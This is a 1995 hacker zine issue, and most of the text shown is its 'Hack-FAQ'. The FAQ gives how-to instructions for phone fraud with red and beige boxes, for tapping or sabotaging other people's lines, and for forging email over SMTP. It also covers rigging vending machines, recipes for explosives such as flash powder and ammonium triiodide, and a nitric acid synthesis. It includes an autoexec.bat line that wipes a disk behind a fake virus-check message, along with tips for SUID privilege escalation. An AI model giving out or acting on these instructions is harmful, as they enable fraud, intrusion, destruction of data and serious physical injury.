Copy Link
Add to Bookmark
Report
Hackers Issue 03
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, October, 1995
Edited by: Revolution
Table Of Contents
From the Editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution
The Hack-FAQ 2.06. . . . . . . . . . . . . . . . . . . Beliasarius and N P
The Pursuit of Knowledge, Notes on the Guild. . . . . . . . . . . . Route
The LACC Mailing List . . . . . . . . . . . . . . . . . . .Julian Assange
2600 Meetings . . . . . . . . . . . . . . . . . . . . . . . . . . . FuSIoN
Billwatch #18 . . . . . . . . . . . . . . Voters Telecommunications Watch
A VMS Login Spoof . . . . . . . . . . . . . . . . . . . . . . . Talonphish
Remote Host Probing. . . . . . . . . . . . . . . . . . . . . . . . IOERROR
The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution
----------------------------------------------------------------- -----------
copyright 1995 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor. HACKERS is published monthly by Mike Scanlon, to be added to the
subscription list or to submit articles mail scanlonr@delphi.com
----------------------------------------------------------------- -----------
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #1 of 9
From the Editor
An amazing amount of things have gone on here at Hackers since last
issue. I started college at NJIT, so you might notice that this issue is
coming from a different address. I've kept my email address the same for
the time being, although if you send anything to mrs3691@hertz.njit.edu I
will receive it also. Hackers has a new web page up, where issues are now
browsable in html form at http://hertz.njit.edu/~mrs3691. There are no
graphics up as of yet, so don't expect anything much.
NJIT is located in Newark New Jersey, so I'm local to all of NYC. If
any of you attend the 2600 meetings in the Citicorp building, plan on seeing
me there in the future.
Alas, due to the increased workload, I've had to diminish my net
presence in recent weeks, but as I adjust I'll probably be on a little more.
In the near future, in fact, my comp sci class might set up a telnetable
BBS, so look for some cool things from that.
When I started this issue, I thought it might suffer because I did
not have enough time to put into it, but a few good submissions turned that
around. This month we have an essay on the guild from it's founding member,
a login spoof you can use with last month's VMS hacking article, and a couple
other cool articles. The Hack-FAQ, although a good source of info for
beginning hackers, is more of a sentimental article due to some things that
have been happening in the old ISCA crowd, such as the return of it's editor
to the scene, and the prospective return of a few other old friends. Also,
I'd like to take this chance to recommend everyone to subscribe to Billwatch.
Although issues of it have been cropping up in here for the last few issues,
if this is your only source of it, you are missing some very good
information. This issue it has some very good info on the state of the
cryptography debate, which I think everybody should take at least a glance
at, so I decided to include it once again.
Anyway, as always I've got to go and do some homework, so I hope you
like this issue.
- Revolution
* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #3, File #2 of 9
+---------------+
| THE HACK-FAQ! |
| Edition 2.06 |
| 14 FEB 1994 |
+---------------+
"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop
<*> Edited by <*>
# Editor-in-Chief #
Belisarius <belsarus@cybernet.cse.fau.edu>
# Asst. Editor #
Neurophire (on Shadow and N P on ISCA)
A MatrixMage Electronic Publication
With help from some members of KARMA/K.R.A.
Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>
Faunus Revolution
Matrixx Amarand
Beelzebub Redbeard
IO CyberSorceror
Doktor Nil Skipster
CPT Ozone Abort
Carsenio
Hi there, Hackers and Newbies alike!
We have compiled this, THE HACK-FAQ!, for all of you out there.
Please if you have any suggestions, contributions, criticisms,
whatever, mail at the above addresses.
You might be wondering...where did edition 2.05 go? Well before I
could get it out I got in a lot more good shit and decided to update
it again before sending it out. To receive a copy of THE HACK-FAQ!
via E-mail then send E-mail to me at the address above.
THE HACK-FAQ! is a roughly monthly update and I am currently looking
for a site with LISTSERV capabilities.
Thanks and keep hacking! Remember to keep working and to always try to
educate yourself and gather information. If you're a newbie then read
THE HACK-FAQ! first and use it as a springboard to start from. If
you're a hacker then please contribute to this document.
-=> Belisarius <=-
Hey, to the CrackerJack crowd, keep struggling!! You can make it above,
that's what I am beginning to do! There is hope! :)
])> Neurophyre <([
Distribution of THE HACK-FAQ! is encouraged and promoted, as long as it
is distributed as the entire file. Keep up with latest editions.
Look for the latest edition of THE HACK-FAQ! in every KARMA/K.R.A.
Irregular Zine.
THE HACK-FAQ! is (c) of MatrixMage(tm) Publications.
MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor
are not responsible for any consequences. You use this information at
your own risk.
***************************************************************** ****
CONTENTS
Sections
I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc)
II. Fake E-Mail
III. Salting Vending Machines
IV. Explosives
V. Virii
VI. UNIX Passwords
VII. Phucking with MS-DOS
VIII. Cracking programs
IX. PGP / Data Encryption
X. Chemistry (drugs and explosive/pyrotechnic component prep)
XI. 'Cyberpunk'/Futuristic/Underground Culture
Appendices
A. FTP sites with useful info
B. Interesting Gophers
C. Informative USENET Newsgroups
D. Publications and Catalogs
E. PGP Key Appendix
***************************************************************** ****
================================================================= ====
I. Phone Fun
WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)
First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.
What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 Mhz from Digikey, address
below)
- A solder gun.
- Someone who can point out the crystal in the Tone
Dialer.
Instructions:
1) Open up the back of the tone dialer. Use screwdriver.
2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 Mhz one you bought, but otherwise
vaguely similar. It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.
3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.
4) Attach 6.5 Mhz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 Mhz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.
5) Put cover back on. you are done.
How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.
To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.
----------------------------------------------------------------- ----
WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.
----------------------------------------------------------------- ----
WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)
----------------------------------------------------------------- ----
WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key. Call 1-800-DIGIKEY
(1-800-344-4539) for more info. The part order number from
DIGI-KEY is x-415-ND
----------------------------------------------------------------- ----
WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *s
Here are the freq's for a red box:
$.25 1700Hz & 2200Hz for a length of 33 milliseconds for each pulse
with 33 millisecond pause between each pulse
$.10 1700Hz & 2200Hz 2 pulses at 66 milliseconds and with 66
millisecond pauses
$.05 one pulse at the above freq's for 66 milliseconds!
----------------------------------------------------------------- ----
HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
is a general term for Customer owned or "Bell-independent" phone
companies. Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.
----------------------------------------------------------------- ----
FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free. Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free. OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.
----------------------------------------------------------------- ----
HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
clips, ratchet wrench, 7/16-inch hex head
1. Cut off the head on one end of the phone cord.
2. Strip the coating.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
(that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
things sticking about 3 feet out of the ground with a Bell logo on
the front. If you're a retard, you'll waste your time with a
cable company box or something. I've heard of it.
8. Come back to a secluded one at night. With the wrench, open it
up.
9. Find a set of terminals (look like the scored [the "screwy end"]
end of bolts in my area) with what should be a red wire and a
green wire coming off them.
10. Plug in your beige box red to red and green to green, pick up the
phone and dial away!
Modems work too as well as taps and shit. You're using someone
else's line (unless you're an idiot) to get phone service. Don't
abuse the same line after the phone bill comes.
----------------------------------------------------------------- ----
BEIGE BOXING 101
Phield Phreaking
by Revolution
At the beginning of the section in the Bell training manual
entitled "One million ways to catch and phry a phreak" it dosen't
have a disclaimer saying "for informational purposes only". So why
the hell should I put one here? Give this phile to whoever the fuck
you want, just make sure it all stays together, same title, same
byline.
Phield phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hitek revenge, anything
you can do from your own fone line and more, without paying for it,
or being afraid of being traced. Just be ready to bail if you see
sirens.
How to make a beige box: Easiest box to make. Cut your fone cord
before the jak, strip the wires a little. You should see a red
(ring) wire and a green (tip) wire. If you see yellow and black
wires too just ignore them. Put one set of alligator clips on the
red wire and one on the green wire, and you're set. (You want to
use your laptop computer, but you don't want to ruin your modem's
fone cord? Just unscrew a jak from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a fone,
laptop, your mom, anything you can plug in a jak.)
How to use: What you have is a lineman's handset. You can use it
from any bell switching apparatus (from now on sw. ap.). These are
on fone poles, where your fone line meets your house, and near
payfones. I'll go into detail below, but basically just open any
box on a telefone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a fone
jak. These screws are where you need to attach your alligator
clips to get a dial tone. Don't unscrew the screw, you'll just
phuck up some poor guys line, and increase your chances of getting
caught. After the wire goes around the screw, it normally twists
off into the air. Put your clip on the end of the wire. Do the
same with the other clip. If you don't get a dial tone, then
switch terminals.
On telefone poles:
TTI terminals: These must have been built by phreaks, just for
beige boxing. By far the easiest sw. ap. use. The only drawback
is that they only connect to one fone line. These are the fist
sized gray or black boxes that appear where a single fone line
meets the mother line. They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front. No bolts or screws to take
off, just snap up the top and you will see four screws. Clip in
and happy phreaking. Just click the top down and no one will ever
know you were there (except for the extra digits on their fone
bill.)
Green trees: just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it. These are the 3 foot high green/gray metal columns that are no
wider than a telefone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign. Usually green
trees are right at the base of fone poles, or within a foot or two
of them. These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off. Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be. Ratchet this one off and the metal
sheet will swing open like a door. On one side of the sheet will
be a paper with a list of #'s this tree connects to. Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way. The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.
Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide. They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts. I wouldn't open it, but with a little info
from phriends and some social engineering, I learned that inside is
where two underground fone lines are spliced together. Also inside
is either pressurized gas or gel. Pretty messy.
Bell canisters: attached to fone poles at waist level. They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off. Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.
Mother load: Largest sw. ap. A large gray green box, like 6x4,
attached to a telefone pole about three feet off the ground. a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
cabinet with double doors. Fasteners are located in the center of
the box and on the upper edge in the center. Both of these are
held on with a 7/16 bolt. Take the bolts off, and swing the doors
open. On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to. And in the box are the terminals. Normally 1,000
fones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 fones the box connects
too).
On houses: follow the fone line to someone's house, and then down
there wall. Either it goes right into there house (then you're
screwed) or it ends in a plastic box. The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off. Inside are 4 terminals, yellow,
black, and red and green, the two you need. Find the Christmas
colors, and phreak out.
On payfones: follow the fone line up from the fone, and sometimes
you'll find a little black box with two screws in it. Undo this,
and you'll find a nice little fone jak. You don't even need your
beige box for that one. If there's not one of those,
follow the
wire to a wall it goes into, and sometimes there'll be a sw. ap.
like those on houses (see above). Payfones are normally pretty
secure now though, and you probably won't find any of those.
Phreaky things you can do: Jesus, do I have to tell you L/-\m3rs
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.
Hitek revenge!
Possibilities are endless, you have total control of this lamers
line. Most of you guys are probably way to 3l33+ for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something alot better: Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telefone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two termianls with a paper clip, alligator clip, even
your mother's pussylips! His fone will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank: Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (asshole's
#)"
That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi. Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, email revolution@delphi.com no PGP needed.
----------------------------------------------------------------- ----
HOW CAN YOU INTERCEPT CELLULAR PHONE CONVERSATIONS?
(from CPT Ozone)
You can intercept most cellular phone signals on any old radio that
pulls in police and air bands? Look for them at garage sales and
junk yards.
----------------------------------------------------------------- ----
WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)
This service is called ANI.
This number may not work, but try it anyway:
(800) 825-6060
You might want to try is dialing 311 ... a recorded message tells you
your phone #. Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.
----------------------------------------------------------------- ----
HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference. Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line. Then call
and set up a teleconference for whenever to be billed to the line
you are calling from. You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to chhose the number of
ports for your conference call, and how to dial each participant..
================================================================= ====
II. Fake E-mail
HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL SMTP)?
(from Beelzebub, Doktor Nil)
1. Telnet to port 25 of any internet server (eg oberlin.edu 25)
2. If at all possible, AVOID TYPING "HELO". Type mail from:(fake name)
3. Type rcpt to:(person who gets mail)
4. The mail server should ok each time after each name.
5. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
6. Retype the commands, it should say ok now.
7. Type data
8. Enter your letter
9. To send letter type a "." on an empty line.
10. Then type quit
11. This is traceable by any sysadmin ... don't harass people this
way.
12. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
"Apparently-To:(name)" even if not, most people wouldn't know
what it means anyway.
13. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any addons the
mail routine might try
14. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the program
probably won't add them on.
15. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.
================================================================= ====
III. Salting vending machines
WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.
================================================================= ====
IV. Explosives
FLASH POWDERS:
(from Neurophyre)
Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.
REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide (if you can find
1 part by weight aluminum powder regular antimony sulfide
contact Neurophyre!)
Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder
*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder
1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.
----------------------------------------------------------------- ----
AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.
================================================================= ====
V. Virii
WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria. [number not available - :( ]
You can't get busted for anything having to do with this BBS.
Problem: They demand a virus they don't have in their archives to
let you in. Good luck finding one. The best way is to write one,
even if it's in BASIC. It'll probably get you in. They have
THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.
----------------------------------------------------------------- ----
INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer
for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sectornubmer, bits 6,7=cylindernumber(high 2 bits),
0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.
================================================================= ====
VI. Unix
HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:
userid:password:userid#:groupid#:GECOS field:home dir:shell
What each of these fields mean/do---
userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.
password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run thru the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.
userid# -=> a unique number assigned to each user, used for
permissions
groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group
GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.
home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)
shell -=> this is the name of the shell which is
automatically started for the login
Note that all the fields are separated by colons in the passwd file.
----------------------------------------------------------------- ----
WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!
----------------------------------------------------------------- ----
WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.
USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.
================================================================= ====
VII. Phucking with MS-DOS
HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.
----------------------------------------------------------------- ----
WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexc.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt
This prevents any output from Wipe being output.
================================================================= ====
VIII. Cracking Programs
WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.
----------------------------------------------------------------- ----
WHERE CAN I GET THESE PROGRAMS?
(from Redbeard)
Crack , CrackerJack, and COPS at
ftp plaza.aarnet.edu.au
in the /secutiry/cert directory
WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.
----------------------------------------------------------------- ----
WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It's
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.
Look for it at ftp plains.nodak.edu
================================================================= ====
IX. PGP / Data Encryption
WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won't get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh....sensitive manner.
----------------------------------------------------------------- ----
WHERE CAN I GET PGP?
(from an archie search)
FTP sites for PGP=Pretty Good Privacy Public Encryption System
--------------------------------------------------------------
========
Unix PGP
========
Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z
Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z
Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z
Host dutepp0.et.tudelft.nl
Location: /pub/Unix/Security
FILE -rw-rw-r-- 651826 Oct 4 12:40 pgp22.tar.Z
Host isy.liu.se
Location: /pub/misc/pgp/2.2
FILE -rw-r--r-- 651826 Mar 10 1993 pgp22.tar.Z
Host lhc.nlm.nih.gov
Location: /pub/hunter
FILE -rw-r--r-- 651826 Jun 30 00:00 pgp22.tar.Z
==========
MS-DOS PGP
==========
Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip
================
MS-DOS PGP SHELL
================
Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip
Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip
Host pc.usl.edu
Location: /pub/msdos/crypto
FILE -rw-r--r-- 65160 Sep 1 15:42 pgpshe22.zip
Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip
Host plaza.aarnet.edu.au
Location: /micros/pc/garbo/pc/crypt
FILE -r--r--r-- 65430 Aug 3 11:40 pgpshe22.zip
Location: /micros/pc/oak/security
FILE -r--r--r-- 65160 Aug 9 20:00 pgpshe22.zip
=======
Mac PGP
=======
Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx
Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx
Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx
================================================================= ====
X. CHEMISTRY
(from Neurophire)
/*\*/*\*/*\*/*\*/*\*/*\*/ COMING SOON /*\*/*\*/*\*/*\*/*\*/*\*/
How to cheaply make Potassium Chlorate! Easily! KClO3 is an
ingredient in some plastic explosives and in unstable flash powders,
as well as incendiary powders, bricks, and quick and dirty smoke mix!
HOW TO MAKE NITRIC ACID:
Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)
There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
Materials: Equipment:
---------- ----------
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod
collecting flask with
stopper
1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.
3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.
4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.
Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one litre of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.
================================================================= ====
XI. 'Cyberpunk'/Futuristic/Underground Culture
"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world." --Unknown
That is the attitude of many of the people who, knowingly or not, are
members of this hyped culture. Some who may read this will see some
of their undefined beliefs, hopes and feelings reflected in the above
quote. And, as the quote says, they will help spread it. Somewhere,
somehow, that quote will change the world.
================================================================= ====
Appendix A. FTP sites with useful info:
ftp.eff.org
wiretap.spies.com
hpacv.com (mail postmaster@hpacv.com for info phirst)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/
black.ox.ac.uk Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov \ These two sites will give you
martini.eecs.umich.edu 3000 / whatever info you need about any city.
